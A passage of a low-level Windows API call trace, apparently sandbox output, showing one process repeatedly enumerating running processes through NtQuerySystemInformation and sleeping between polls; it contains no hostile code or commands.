NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.029] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.046] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.061] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.073] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.076] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.092] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.120] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.121] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.140] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.154] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.157] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.172] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.182] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.185] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.197] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.197] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.201] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.217] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.233] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.244] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.244] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.245] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.245] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.247] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.265] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.279] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.295] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.306] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.311] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.326] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.338] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.341] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0150.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0150.354] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0150.354] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0150.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0150.356] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0150.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0150.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 